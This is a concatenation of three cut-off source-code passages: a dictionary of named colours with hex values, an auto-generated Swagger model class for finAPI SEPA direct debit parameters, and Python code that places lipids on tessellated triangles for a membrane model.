"Biloxi": 0xF4E4CD,
"Biloxi Blue": 0x0075B8,
"Biltmore Buff": 0xE3C9A1,
"Biltong": 0x410200,
"Bimini Blue": 0x007A91,
"Binary Star": 0x616767,
"Bindi Dot": 0x8B3439,
"Bindi Red": 0xB0003C,
"Bing Cherry Pie": 0xAF4967,
"Binrouji Black": 0x433D3C,
"Bio Blue": 0x465F9E,
"Biogenic Sand": 0xFFEFD5,
"Biohazard Suit": 0xFBFB4C,
"Biology Experiments": 0x91A135,
"Bioluminescence": 0x55EEFF,
"BioShock": 0x889900,
"Biotic Grasp": 0xEEEE44,
"Biotic Orb": 0xEEDD55,
"Birch": 0x3F3726,
"Birch Beige": 0xD9C3A1,
"Birch Forest": 0x899A8B,
"Birch Leaf Green": 0x637E1D,
"Birch Strain": 0xDFB45F,
"Birch White": 0xF6EEDF,
"Birchwood": 0xCCBEAC,
"Birchy Woods": 0x806843,
"Bird Blue": 0x7B929E,
"Bird Blue Grey": 0x7F92A0,
"Bird Flower": 0xD0C117,
"Bird Of Paradise": 0x0083A8,
"Bird's Child": 0xFFF1CF,
"Bird's Egg Green": 0xAACCB9,
"Bird's Nest": 0xCFBB9B,
"Bird’s Eye": 0xB9030A,
"Birdhouse Brown": 0x6C483A,
"Birdie": 0xE9E424,
"Birdie Num Num": 0x89ACDA,
"Birdseed": 0xE2C28E,
"Birdseye Maple": 0xE4C495,
"Biro Blue": 0x2F3946,
"Birōdo Green": 0x224634,
"Birth of a Star": 0xFCE9DF,
"Birthday Cake": 0xE9D2CC,
"Birthday Candle": 0xCFA2AD,
"Birthday King": 0x9BDCB9,
"Birthday Suit": 0xE2C7B6,
"Birthstone": 0x79547A,
"Biscay": 0x2F3C53,
"Biscay Bay": 0x097988,
"Biscay Green": 0x55C6A9,
"Biscotti": 0xDAC7AB,
"Biscuit": 0xFEEDCA,
"Biscuit Beige": 0xE6BFA6,
"Biscuit Cream": 0xF9CCB7,
"Biscuit Dough": 0xE8DBBD,
"Bishop Red": 0xC473A9,
"Bismarck": 0x486C7A,
"Bison": 0x6E4F3A,
"Bison Beige": 0x9F9180,
"Bison Brown": 0x584941,
"Bison Hide": 0xB5AC94,
"Bisque": 0xFFE4C4,
"Bisque Tan": 0xE5D2B0,
"Bistre": 0x3D2B1F,
"Bistre Brown": 0x967117,
"Bistro": 0x705950,
"Bistro Green": 0x395551,
"Bit of Berry": 0xDD5599,
"Bit of Blue": 0xE2EAEB,
"Bit of Heaven": 0xCAD7DE,
"Bit of Lime": 0xE1E5AC,
"Bit of Sugar": 0xF4F2EC,
"Bitcoin": 0xFFBB11,
"Bite the Bullet": 0xECEBCE,
"Bitter": 0x88896C,
"Bitter Briar": 0x8D7470,
"Bitter Chocolate": 0x9E5B40,
"Bitter Clover Green": 0x769789,
"Bitter Dandelion": 0x6ECB3C,
"Bitter Lemon": 0xD2DB32,
"Bitter Lime": 0xCFFF00,
"Bitter Melon": 0xCFD1B2,
"Bitter Orange": 0xD5762B,
"Bitter Sage": 0x97A18D,
"Bitter Violet": 0x856D9E,
"Bittersweet": 0xFEA051,
"Bittersweet Shimmer": 0xBF4F51,
"Bittersweet Stem": 0xCBB49A,
"Bizarre": 0xE7D2C8,
"Black": 0x000000,
"Black Bamboo": 0x5B5D53,
"Black Bay": 0x474A4E,
"Black Bean": 0x4E4B4A,
"Black Beauty": 0x26262A,
"Black Blueberry": 0x2F2F48,
"Black Boudoir": 0x454749,
"Black Cat": 0x2E2F31,
"Black Chestnut Oak": 0x252321,
"Black Chocolate": 0x441100,
"Black Coffee": 0x3B302F,
"Black Coral": 0x54626F,
"Black Dahlia": 0x4E434D,
"Black Diamond Apple": 0x8A779A,
"Black Dragon's Cauldron": 0x545562,
"Black Drop": 0x90ABD9,
"Black Elder": 0xA66E7A,
"Black Elegance": 0x50484A,
"Black Emerald": 0x12221D,
"Black Evergreen": 0x45524F,
"Black Feather": 0x112222,
"Black Flame": 0x484B5A,
"Black Forest": 0x5E6354,
"Black Forest Blue": 0x29485A,
"Black Forest Green": 0x424740,
"Black Fox": 0x4F4842,
"Black Garnet": 0x4E4444,
"Black Glaze": 0x001111,
"Black Green": 0x384E49,
"Black Grey": 0x24272E,
"Black Haze": 0xE0DED7,
"Black Headed Gull": 0x9C856C,
"Black Hills Gold": 0xC89180,
"Black Hole": 0x010203,
"Black Htun": 0x110033,
"Black Ice": 0x4D5051,
"Black Ink": 0x44413C,
"Black Iris": 0x2B3042,
"Black Is Beautiful": 0x552222,
"Black Jasmine Rice": 0x74563D,
"Black Kite": 0x351E1C,
"Black Knight": 0x010B13,
"Black Lacquer": 0x3F3E3E,
"Black Lead": 0x474C4D,
"Black Leather Jacket": 0x253529,
"Black Licorice": 0x3A3B3B,
"Black Locust": 0x646763,
"Black Magic": 0x4F4554,
"Black Mana": 0x858585,
"Black Market": 0x222244,
"Black Marlin": 0x383740,
"Black Mesa": 0x222211,
"Black Metal": 0x060606,
"Black Mocha": 0x4B4743,
"Black Oak": 0x4E4F4E,
"Black of Night": 0x323639,
"Black Olive": 0x3B3C36,
"Black Onyx": 0x2B272B,
"Black Orchid": 0x525463,
"Black Out": 0x222222,
"Black Panther": 0x424242,
"Black Pearl": 0x1E272C,
"Black Pine Green": 0x33654A,
"Black Plum": 0x6C5765,
"Black Pool": 0x4F5552,
"Black Powder": 0x34342C,
"Black Power": 0x654B37,
"Black Pudding": 0xA44A56,
"Black Queen": 0x694D27,
"Black Raspberry": 0x16110D,
"Black Ribbon": 0x484C51,
"Black River Falls": 0x343E54,
"Black Rock": 0x2C2D3C,
"Black Rooster": 0x331111,
"Black Rose": 0x532934,
"Black Russian": 0x24252B,
"Black Sabbath": 0x220022,
"Black Sable": 0x434B4D,
"Black Safflower": 0x302833,
"Black Sand": 0x5B4E4B,
"Black Sapphire": 0x434555,
"Black Shadows": 0xBFAFB2,
"Black Sheep": 0x0F0D0D,
"Black Slug": 0x332211,
"Black Smoke": 0x3E3E3F,
"Black Soap": 0x19443C,
"Black Space": 0x545354,
"Black Spruce": 0x4C5752,
"Black Squeeze": 0xE5E6DF,
"Black Suede": 0x434342,
"Black Swan": 0x332200,
"Black Tie": 0x464647,
"Black Tortoise": 0x353235,
"Black Truffle": 0x463D3E,
"Black Velvet": 0x222233,
"Black Violet": 0x2B2C42,
"Black Walnut": 0x5E4F46,
"Black Wash": 0x0C0C0C,
"Black Water": 0x2E4846,
"Black White": 0xE5E4DB,
"Blackadder": 0x292C2C,
"Blackberry": 0x43182F,
"Blackberry Black": 0x2E2848,
"Blackberry Burgundy": 0x4C3938,
"Blackberry Cobbler": 0x404D6A,
"Blackberry Cordial": 0x3F2A47,
"Blackberry Cream": 0xD9D3DA,
"Blackberry Deep Red": 0x633654,
"Blackberry Farm": 0x62506B,
"Blackberry Harvest": 0x504358,
"Blackberry Jam": 0x87657E,
"Blackberry Leaf Green": 0x507F6D,
"Blackberry Mocha": 0xA58885,
"Blackberry Pie": 0x64242E,
"Blackberry Sorbet": 0xC1A3B9,
"Blackberry Tint": 0x8F5973,
"Blackberry Wine": 0x4D3246,
"Blackberry Yogurt": 0xE5BDDF,
"Blackbird": 0x3F444C,
"Blackbird's Ggg": 0xFCE7E4,
"Blackboard Green": 0x274C43,
"Blackcurrant": 0x2E183B,
"Blackcurrant Conserve": 0x52383D,
"Blackcurrant Elixir": 0x5C4F6A,
"Blackened Brown": 0x442200,
"Blackened Pearl": 0x4D4B50,
"Blackest Berry": 0x662266,
"Blackest Brown": 0x403330,
"Blackfire Earth": 0x7A5901,
"Blackheath": 0x49454B,
"Blackish Brown": 0x453B32,
"Blackish Green": 0x5D6161,
"Blackish Grey": 0x5B5C61,
"Blackjack": 0x51504D,
"Blacklist": 0x221133,
"Blackmail": 0x220066,
"Blackout": 0x0E0702,
"Blackthorn Berry": 0x8470FF,
"Blackthorn Blue": 0x4C606B,
"Blackthorn Green": 0x739C69,
"Blackwater": 0x545663,
"Blackwater Park": 0x696268,
"Blade Green": 0x6A9266,
"Bladed Grass": 0x758269,
"Bladerunner": 0x6A8561,
"Blair": 0xA1BDE0,
"Blanc": 0xD9D0C2,
"Blanc Cassé": 0xF1EEE2,
"Blanc De Blanc": 0xE7E9E7,
"Blanca Peak": 0xF8F9F4,
"Blanched Almond": 0xFFEBCD,
"Blanched Driftwood": 0xCCBEB6,
"Bland": 0xAFA88B,
"Blank Canvas": 0xFFEFD6,
"Blanka Green": 0x9CD33C,
"Blanket Brown": 0x9E8574,
"Blarney": 0x00A776,
"Blarney Stone": 0x027944,
"Blast-Off Bronze": 0xA57164,
"Blasted Lands Rocks": 0x6C3550,
"Blaze": 0xFA8C4F,
"Blaze Orange": 0xFE6700,
"Blazing Autumn": 0xF3AD63,
"Blazing Bonfire": 0xFFA035,
"Blazing Orange": 0xFFA64F,
"Blazing Yellow": 0xFEE715,
"Bleach White": 0xEBE1CE,
"Bleached Almond": 0xF3EAD5,
"Bleached Apricot": 0xFCCAAC,
"Bleached Aqua": 0xBCE3DF,
"Bleached Bare": 0xD0C7C3,
"Bleached Bark": 0x8B7F78,
"Bleached Bone": 0xEFD9A8,
"Bleached Cedar": 0x2C2133,
"Bleached Coral": 0xFFD6D1,
"Bleached Denim": 0x646F9B,
"Bleached Grey": 0x788878,
"Bleached Jade": 0xE2E6D1,
"Bleached Linen": 0xF3ECE1,
"Bleached Maple": 0xC7A06C,
"Bleached Meadow": 0xEAE5D5,
"Bleached Sand": 0xDACCB4,
"Bleached Shell": 0xF6E5DA,
"Bleached Silk": 0xF3F3F2,
"Bleached Spruce": 0xBAD7AE,
"Bleached Wheat": 0xDDD2A9,
"Bleached White": 0xDFE3E8,
"Bleaches": 0xC7C7C3,
"Bleeding Heart": 0xC02E4C,
"Blende Blue": 0xA9C4C4,
"Blended Fruit": 0xF8E3A4,
"Blended Light": 0xFFFBE8,
"Blessed Blue": 0x4499CC,
"Bleu Ciel": 0x007BA1,
"Bleu De France": 0x318CE7,
"Bleu Nattier": 0x9CC2BF,
"Bleuchâtel Blue": 0x4488FF,
"Blind Date": 0xBCAEA1,
"Blind Forest": 0x223300,
"Bling Bling": 0xEEF0CE,
"Blinking Blue": 0x0033FF,
"Blinking Terminal": 0x66CC00,
"Bliss Blue": 0x7AC7E1,
"Blissful": 0xDDC4D4,
"Blissful Berry": 0xAA1188,
"Blissful Blue": 0xB2C8D8,
"Blissful Light": 0xE5D2DD,
"Blissful Meditation": 0xD5DAEE,
"Blissful Orange": 0xFFAC39,
"Blissful Serenity": 0xEAEED8,
"Blissfully Mine": 0xDAB6CD,
"Blister Pearl": 0xAAFFEE,
"Blithe": 0x0084BD,
"Blithe Blue": 0x90BDBD,
"Blizzard": 0xE5EBED,
"Blizzard Blue": 0xA3E3ED,
"Blobfish": 0xFFC1CC,
"Blockchain Gold": 0xE8BC50,
"Bloedworst": 0x560319,
"Blond": 0xFAF0BE,
"Blonde": 0xDCBD92,
"Blonde Beauty": 0xF2EFCD,
"Blonde Curl": 0xEFE2C5,
"Blonde Girl": 0xEDC558,
"Blonde Lace": 0xD6B194,
"Blonde Shell": 0xF6EDCD,
"Blonde Wood": 0xAB7741,
"Blonde Wool": 0xE5D0B1,
"Blood": 0x770001,
"Blood Brother": 0x770011,
"Blood Burst": 0xFF474C,
"Blood Donor": 0xEA1822,
"Blood God": 0x67080B,
"Blood Mahogany": 0x543839,
"Blood Moon": 0xD83432,
"Blood Omen": 0x8A0303,
"Blood Orange": 0xD1001C,
"Blood Orange Juice": 0xFE4B03,
"Blood Organ": 0x630F0F,
"Blood Pact": 0x771111,
"Blood Red": 0x980002,
"Blood Rose": 0x73404D,
"Blood Rush": 0xAA2222,
"Blood Thorn": 0xB03060,
"Bloodhound": 0xBB5511,
"Bloodletter": 0xE97451,
"Bloodline": 0x882200,
"Bloodmyst Isle": 0xF02723,
"Bloodstain": 0x772200,
"Bloodstone": 0x413431,
"Bloodthirsty": 0x880011,
"Bloodthirsty Beige": 0xF8D7D0,
"Bloodthirsty Vampire": 0x9B0503,
"Bloodthirsty Warlock": 0xEC1837,
"Bloodtracker Brown": 0x703F00,
"Bloody Periphylla": 0xAA1144,
"Bloody Pico-8": 0xFF004D,
"Bloody Red": 0xCA1F1B,
"Bloody Rust": 0xDA2C43,
"Bloody Salmon": 0xCC4433,
"Bloom": 0xFFAF75,
"Blooming Aster": 0xD7E2EE,
"Blooming Dahlia": 0xEB9687,
"Blooming Lilac": 0xBA93AF,
"Blooming Perfect": 0xD89696,
"Blooming Wisteria": 0x88777E,
"Bloomsberry": 0xA598C4,
"Blossom": 0xFEE9D8,
"Blossom Blue": 0xAACCEE,
"Blossom Mauve": 0xA3A7CC,
"Blossom Pink": 0xE6D5CE,
"Blossom Powder": 0xC3B3B9,
"Blossom Time": 0xE5D2C9,
"Blossom White": 0xF2EEE4,
"Blossom Yellow": 0xE1C77D,
"Blossoms in Spring": 0xE79ACB,
"Blouson Blue": 0x67B7C6,
"Blowing Kisses": 0xF6DEE0,
"Blowout": 0x658499,
"Blue": 0x0000FF,
"Blue Accolade": 0x25415D,
"Blue Agave": 0xB1C6C7,
"Blue Alps": 0x89A3AE,
"Blue Android Base": 0x5A79BA,
"Blue Angel": 0x0022DD,
"Blue Angels Yellow": 0xF8B800,
"Blue Angora": 0xA7CFCB,
"Blue Antarctic": 0x4B789B,
"Blue Anthracite": 0x555E64,
"Blue Arc": 0x0085A1,
"Blue Ash": 0x414654,
"Blue Ashes": 0x3B5F78,
"Blue Aster": 0x0077B3,
"Blue Astro": 0x50A7D9,
"Blue Atoll": 0x00B1D2,
"Blue Aura": 0x6C7386,
"Blue Azure": 0x4682BF,
"Blue Ballad": 0x7498BD,
"Blue Ballerina": 0xB4C7DB,
"Blue Ballet": 0x576B6B,
"Blue Bauble": 0xABDEE3,
"Blue Bay": 0x619AD6,
"Blue Bayberry": 0x2D5360,
"Blue Bayou": 0xBEC4D3,
"Blue Beads": 0x5A809E,
"Blue Beauty": 0x7498BF,
"Blue Beetle": 0x220099,
"Blue Bell": 0x93B4D7,
"Blue Beret": 0x40638E,
"Blue | |
# coding: utf-8
"""
finAPI RESTful Services
finAPI RESTful Services # noqa: E501
OpenAPI spec version: v1.42.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from swagger_client.models.single_direct_debit_data import SingleDirectDebitData # noqa: F401,E501
class RequestSepaDirectDebitParams(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'account_id': 'int',
'banking_pin': 'str',
'two_step_procedure_id': 'str',
'direct_debit_type': 'str',
'sequence_type': 'str',
'execution_date': 'str',
'direct_debits': 'list[SingleDirectDebitData]'
}
attribute_map = {
'account_id': 'accountId',
'banking_pin': 'bankingPin',
'two_step_procedure_id': 'twoStepProcedureId',
'direct_debit_type': 'directDebitType',
'sequence_type': 'sequenceType',
'execution_date': 'executionDate',
'direct_debits': 'directDebits'
}
def __init__(self, account_id=None, banking_pin=None, two_step_procedure_id=None, direct_debit_type=None, sequence_type=None, execution_date=None, direct_debits=None): # noqa: E501
"""RequestSepaDirectDebitParams - a model defined in Swagger""" # noqa: E501
self._account_id = None
self._banking_pin = None
self._two_step_procedure_id = None
self._direct_debit_type = None
self._sequence_type = None
self._execution_date = None
self._direct_debits = None
self.discriminator = None
self.account_id = account_id
if banking_pin is not None:
self.banking_pin = banking_pin
if two_step_procedure_id is not None:
self.two_step_procedure_id = two_step_procedure_id
self.direct_debit_type = direct_debit_type
self.sequence_type = sequence_type
self.execution_date = execution_date
self.direct_debits = direct_debits
@property
def account_id(self):
"""Gets the account_id of this RequestSepaDirectDebitParams. # noqa: E501
Identifier of the bank account to which you want to transfer the money. # noqa: E501
:return: The account_id of this RequestSepaDirectDebitParams. # noqa: E501
:rtype: int
"""
return self._account_id
@account_id.setter
def account_id(self, account_id):
"""Sets the account_id of this RequestSepaDirectDebitParams.
Identifier of the bank account to which you want to transfer the money. # noqa: E501
:param account_id: The account_id of this RequestSepaDirectDebitParams. # noqa: E501
:type: int
"""
if account_id is None:
raise ValueError("Invalid value for `account_id`, must not be `None`") # noqa: E501
self._account_id = account_id
@property
def banking_pin(self):
"""Gets the banking_pin of this RequestSepaDirectDebitParams. # noqa: E501
Online banking PIN. If a PIN is stored in the account's bank connection, then this field may remain unset. If the field is set though then it will always be used (even if there is some other PIN stored in the bank connection). # noqa: E501
:return: The banking_pin of this RequestSepaDirectDebitParams. # noqa: E501
:rtype: str
"""
return self._banking_pin
@banking_pin.setter
def banking_pin(self, banking_pin):
"""Sets the banking_pin of this RequestSepaDirectDebitParams.
Online banking PIN. If a PIN is stored in the account's bank connection, then this field may remain unset. If the field is set though then it will always be used (even if there is some other PIN stored in the bank connection). # noqa: E501
:param banking_pin: The banking_pin of this RequestSepaDirectDebitParams. # noqa: E501
:type: str
"""
self._banking_pin = banking_pin
@property
def two_step_procedure_id(self):
"""Gets the two_step_procedure_id of this RequestSepaDirectDebitParams. # noqa: E501
The bank-given ID of the two-step-procedure that should be used for the direct debit order. For a list of available two-step-procedures, see the corresponding bank connection (GET /bankConnections). If this field is not set, then the bank connection's default two-step procedure will be used. Note that in this case, when the bank connection has no default two-step procedure set, then the service will return an error (see response messages for details). # noqa: E501
:return: The two_step_procedure_id of this RequestSepaDirectDebitParams. # noqa: E501
:rtype: str
"""
return self._two_step_procedure_id
@two_step_procedure_id.setter
def two_step_procedure_id(self, two_step_procedure_id):
"""Sets the two_step_procedure_id of this RequestSepaDirectDebitParams.
The bank-given ID of the two-step-procedure that should be used for the direct debit order. For a list of available two-step-procedures, see the corresponding bank connection (GET /bankConnections). If this field is not set, then the bank connection's default two-step procedure will be used. Note that in this case, when the bank connection has no default two-step procedure set, then the service will return an error (see response messages for details). # noqa: E501
:param two_step_procedure_id: The two_step_procedure_id of this RequestSepaDirectDebitParams. # noqa: E501
:type: str
"""
self._two_step_procedure_id = two_step_procedure_id
@property
def direct_debit_type(self):
"""Gets the direct_debit_type of this RequestSepaDirectDebitParams. # noqa: E501
Type of the direct debit; either <code>BASIC</code> or <code>B2B</code> (Business-To-Business). Please note that an account which supports the basic type must not necessarily support B2B (or vice versa). Check the source account's 'supportedOrders' field to find out which types of direct debit it supports.<br/><br/> # noqa: E501
:return: The direct_debit_type of this RequestSepaDirectDebitParams. # noqa: E501
:rtype: str
"""
return self._direct_debit_type
@direct_debit_type.setter
def direct_debit_type(self, direct_debit_type):
"""Sets the direct_debit_type of this RequestSepaDirectDebitParams.
Type of the direct debit; either <code>BASIC</code> or <code>B2B</code> (Business-To-Business). Please note that an account which supports the basic type must not necessarily support B2B (or vice versa). Check the source account's 'supportedOrders' field to find out which types of direct debit it supports.<br/><br/> # noqa: E501
:param direct_debit_type: The direct_debit_type of this RequestSepaDirectDebitParams. # noqa: E501
:type: str
"""
if direct_debit_type is None:
raise ValueError("Invalid value for `direct_debit_type`, must not be `None`") # noqa: E501
allowed_values = ["B2B", "BASIC"] # noqa: E501
if direct_debit_type not in allowed_values:
raise ValueError(
"Invalid value for `direct_debit_type` ({0}), must be one of {1}" # noqa: E501
.format(direct_debit_type, allowed_values)
)
self._direct_debit_type = direct_debit_type
@property
def sequence_type(self):
"""Gets the sequence_type of this RequestSepaDirectDebitParams. # noqa: E501
Sequence type of the direct debit. Possible values:<br/><br/>• <code>OOFF</code> - means that this is a one-time direct debit order<br/>• <code>FRST</code> - means that this is the first in a row of multiple direct debit orders<br/>• <code>RCUR</code> - means that this is one (but not the first or final) within a row of multiple direct debit orders<br/>• <code>FNAL</code> - means that this is the final in a row of multiple direct debit orders<br/><br/> # noqa: E501
:return: The sequence_type of this RequestSepaDirectDebitParams. # noqa: E501
:rtype: str
"""
return self._sequence_type
@sequence_type.setter
def sequence_type(self, sequence_type):
"""Sets the sequence_type of this RequestSepaDirectDebitParams.
Sequence type of the direct debit. Possible values:<br/><br/>• <code>OOFF</code> - means that this is a one-time direct debit order<br/>• <code>FRST</code> - means that this is the first in a row of multiple direct debit orders<br/>• <code>RCUR</code> - means that this is one (but not the first or final) within a row of multiple direct debit orders<br/>• <code>FNAL</code> - means that this is the final in a row of multiple direct debit orders<br/><br/> # noqa: E501
:param sequence_type: The sequence_type of this RequestSepaDirectDebitParams. # noqa: E501
:type: str
"""
if sequence_type is None:
raise ValueError("Invalid value for `sequence_type`, must not be `None`") # noqa: E501
allowed_values = ["OOFF", "FRST", "RCUR", "FNAL"] # noqa: E501
if sequence_type not in allowed_values:
raise ValueError(
"Invalid value for `sequence_type` ({0}), must be one of {1}" # noqa: E501
.format(sequence_type, allowed_values)
)
self._sequence_type = sequence_type
@property
def execution_date(self):
"""Gets the execution_date of this RequestSepaDirectDebitParams. # noqa: E501
Execution date for the direct debit(s), in the format 'yyyy-MM-dd'. # noqa: E501
:return: The execution_date of this RequestSepaDirectDebitParams. # noqa: E501
:rtype: str
"""
return self._execution_date
@execution_date.setter
def execution_date(self, execution_date):
"""Sets the execution_date of this RequestSepaDirectDebitParams.
Execution date for the direct debit(s), in the format 'yyyy-MM-dd'. # noqa: E501
:param execution_date: The execution_date of this RequestSepaDirectDebitParams. # noqa: E501
:type: str
"""
if execution_date is None:
raise ValueError("Invalid value for `execution_date`, must not be `None`") # noqa: E501
self._execution_date = execution_date
@property
def direct_debits(self):
"""Gets the direct_debits of this RequestSepaDirectDebitParams. # noqa: E501
List of the direct debits that you want to execute. Please check the account's 'supportedOrders' field to find out whether you can pass multiple direct debits or just one. # noqa: E501
:return: The direct_debits of this RequestSepaDirectDebitParams. # noqa: E501
:rtype: list[SingleDirectDebitData]
"""
return self._direct_debits
@direct_debits.setter
def direct_debits(self, direct_debits):
"""Sets the direct_debits of this RequestSepaDirectDebitParams.
List of the direct debits that you want to execute. Please check the account's 'supportedOrders' field to find out whether you can pass multiple direct debits or just one. # noqa: E501
:param direct_debits: The direct_debits | |
the tessellated 3D triangle
u = tile_triangle[0] - tile_triangle.center()
v = tile_triangle[1] - tile_triangle.center()
r1_r2_angle = angle_between(u, v)
u = tile_triangle[0] - tile_triangle.center()
v = tile_triangle[2] - tile_triangle.center()
r1_r3_angle = angle_between(u, v)
# calculate the appropriate location of an identical triangle on the user-defined planar-bilayer model. ignoring z for now (since lipid is oriented along x-y plane)
lipid_triangle_pt1 = numpy.array([0.0, tile_r1, 0.0])
lipid_triangle_pt2 = numpy.array([-tile_r2 * numpy.cos(r1_r2_angle - (numpy.pi/2.0)), -tile_r2 * numpy.sin(r1_r2_angle - (numpy.pi/2.0)), 0.0])
lipid_triangle_pt3 = numpy.array([tile_r3 * numpy.cos(r1_r3_angle - (numpy.pi/2.0)), -tile_r3 * numpy.sin(r1_r3_angle - (numpy.pi/2.0)), 0.0])
# rotate the identical triangle randomly about z axis
random_theta = numpy.random.uniform(0, 2.0 * numpy.pi)
rot_matrix = numpy.array([[numpy.cos(random_theta), numpy.sin(random_theta), 0.0], [-numpy.sin(random_theta), numpy.cos(random_theta), 0.0], [0.0, 0.0, 1.0]])
lipid_triangle_pt1 = numpy.dot(rot_matrix, lipid_triangle_pt1)
lipid_triangle_pt2 = numpy.dot(rot_matrix, lipid_triangle_pt2)
lipid_triangle_pt3 = numpy.dot(rot_matrix, lipid_triangle_pt3)
# now pick an appropriate location, and move the identical triangle to that location along x-y plane
lipid_triangle_center_x = numpy.random.uniform(min_headgroups[0]+tile_triangle.max_radius(), max_headgroups[0]-tile_triangle.max_radius())
lipid_triangle_center_y = numpy.random.uniform(min_headgroups[1]+tile_triangle.max_radius(), max_headgroups[1]-tile_triangle.max_radius())
lipid_triangle_center = numpy.array([lipid_triangle_center_x, lipid_triangle_center_y, 0.0])
lipid_triangle_pt1 = lipid_triangle_pt1 + lipid_triangle_center
lipid_triangle_pt2 = lipid_triangle_pt2 + lipid_triangle_center
lipid_triangle_pt3 = lipid_triangle_pt3 + lipid_triangle_center
lipid_triangle = numpy.array([lipid_triangle_pt1, lipid_triangle_pt2, lipid_triangle_pt3])
# now get the transformation matrix to transform the identical triangle onto the 3D tessellated triangle
# and apply the transformation
transform_data = get_transformation_data(tile_triangle.points, lipid_triangle)
lipid.undo()
apply_transformation(lipid,transform_data)
# project the headgroups of the planar bilayer onto the identical triangle
headgroup_markers_indices = lipid.get_indices_of_mask_match(params['lipid_headgroup_marker'])
headgroup_markers_coors = lipid.all_atoms_numpy[headgroup_markers_indices]
headgroup_marker_proj_coors = tile_triangle.project_points_onto_triangle(headgroup_markers_coors)
# identify the indices of the head groups that fall within the triangle when projected
headgroup_indices_to_keep = get_numpy_slice(headgroup_markers_indices, tile_triangle.get_indices_of_points_within_triangle_boundaries(headgroup_marker_proj_coors))
# there are legitamte circumstances where no headgroups should be retained (i.e., no headgroups fall within the triangle boundaries)
# for example, sometimes the scipy tesselation could produce "triangles" that are actually lines.
# so abort efforts if this is the case.
if len(headgroup_indices_to_keep) == 0 and len(headgroup_marker_proj_coors) !=0:
molecules_in_this_triangle = []
if params['use_disk_instead_of_memory'] == "TRUE":
an_id = save_pickle(molecules_in_this_triangle, params)
self.results.append((tile_triangle, an_id))
else: self.results.append((tile_triangle, molecules_in_this_triangle))
return
# identify the indices of the head groups that fall within a smaller triangle, that are too far from the edges to worry about steric clashes in subsequent steps.
# this speeds up subsequent steps significantly
smaller_tri = tile_triangle.new_triangle_expanded_by_margin(-params['clashing_potential_margin'])
todel = smaller_tri.get_indices_of_points_within_triangle_boundaries(headgroup_marker_proj_coors)
headgroup_indices_not_in_triangle_margin = get_numpy_slice(headgroup_markers_indices, todel)
# identify the indices of the head groups that fall within an even smaller triangle, called the submargin.
# identifying these headgroups will speed up the lipid-filling step later. Lipids will be placed in the margin, and the steric clashes are checked with the lipids of the submargin (as well as the margins of neighboring triangles)
smaller_still_tri = smaller_tri.new_triangle_expanded_by_margin(-params['clashing_potential_margin'])
todel = smaller_still_tri.get_indices_of_points_within_triangle_boundaries(headgroup_marker_proj_coors)
headgroup_indices_not_in_triangle_margin_or_submargin = get_numpy_slice(headgroup_markers_indices, todel)
# now get the entire lipids corresponding to these headgroups
molecules_in_this_triangle = []
# first, identify all residues
atom_counts = len(lipid.atom_inf_resids)
all_ids = numpy.core.defchararray.add(lipid.atom_inf_string_vals[:,0], numpy.array(['_'] * atom_counts))
all_ids = numpy.core.defchararray.add(all_ids, lipid.atom_inf_resids)
all_ids = numpy.core.defchararray.add(all_ids, numpy.array(['_'] * atom_counts))
all_ids = numpy.core.defchararray.add(all_ids, lipid.atom_inf_string_vals[:,1])
# now identify all residues to keep
atom_counts = len(headgroup_indices_to_keep)
if atom_counts != 0:
hg_ids = numpy.core.defchararray.add(lipid.atom_inf_string_vals[headgroup_indices_to_keep,0], numpy.array(['_'] * atom_counts))
hg_ids = numpy.core.defchararray.add(hg_ids, lipid.atom_inf_resids[headgroup_indices_to_keep])
hg_ids = numpy.core.defchararray.add(hg_ids, numpy.array(['_'] * atom_counts))
hg_ids = numpy.core.defchararray.add(hg_ids, lipid.atom_inf_string_vals[headgroup_indices_to_keep,1])
else:
hg_ids = numpy.array([])
# now identify all residues to never delete (inside inner triangle)
atom_counts = len(headgroup_indices_not_in_triangle_margin)
if atom_counts != 0:
hg_ids_not_in_triangle_margin = numpy.core.defchararray.add(lipid.atom_inf_string_vals[headgroup_indices_not_in_triangle_margin,0], numpy.array(['_'] * atom_counts))
hg_ids_not_in_triangle_margin = numpy.core.defchararray.add(hg_ids_not_in_triangle_margin, lipid.atom_inf_resids[headgroup_indices_not_in_triangle_margin])
hg_ids_not_in_triangle_margin = numpy.core.defchararray.add(hg_ids_not_in_triangle_margin, numpy.array(['_'] * atom_counts))
hg_ids_not_in_triangle_margin = numpy.core.defchararray.add(hg_ids_not_in_triangle_margin, lipid.atom_inf_string_vals[headgroup_indices_not_in_triangle_margin,1])
else:
hg_ids_not_in_triangle_margin = numpy.array([])
# now identify all residues that are even interior to the submargin
atom_counts = len(headgroup_indices_not_in_triangle_margin_or_submargin)
if atom_counts != 0:
hg_ids_not_in_triangle_margin_or_submargin = numpy.core.defchararray.add(lipid.atom_inf_string_vals[headgroup_indices_not_in_triangle_margin_or_submargin,0], numpy.array(['_'] * atom_counts))
hg_ids_not_in_triangle_margin_or_submargin = numpy.core.defchararray.add(hg_ids_not_in_triangle_margin_or_submargin, lipid.atom_inf_resids[headgroup_indices_not_in_triangle_margin_or_submargin])
hg_ids_not_in_triangle_margin_or_submargin = numpy.core.defchararray.add(hg_ids_not_in_triangle_margin_or_submargin, numpy.array(['_'] * atom_counts))
hg_ids_not_in_triangle_margin_or_submargin = numpy.core.defchararray.add(hg_ids_not_in_triangle_margin_or_submargin, lipid.atom_inf_string_vals[headgroup_indices_not_in_triangle_margin_or_submargin,1])
else:
hg_ids_not_in_triangle_margin_or_submargin = numpy.array([])
# remove the lipids that are beyond the bounds of this triangle to speed up subsequent searching
# Find the indices of elements of all_ids that are in hg_ids.
iall_ids = numpy.in1d(all_ids.ravel(), hg_ids).reshape(all_ids.shape)
indices_of_lipids_to_keep = numpy.where(iall_ids)[0]
lipid = lipid.portion_of(indices_of_lipids_to_keep)
all_ids = all_ids[indices_of_lipids_to_keep]
# find where to split this lipid model into individual lipids
all_ids_offset = all_ids.copy()
all_ids_offset = numpy.append(all_ids_offset, all_ids_offset[0])
all_ids_offset = all_ids_offset[numpy.arange(1, len(all_ids_offset), dtype=int)]
indices_of_each_lipid = 1 + numpy.nonzero(numpy.logical_not(all_ids == all_ids_offset))[0]
indices_of_each_lipid = numpy.insert(indices_of_each_lipid,0,0)
# now move each individual lipid into its own object and append
gc.disable() # because appending objects
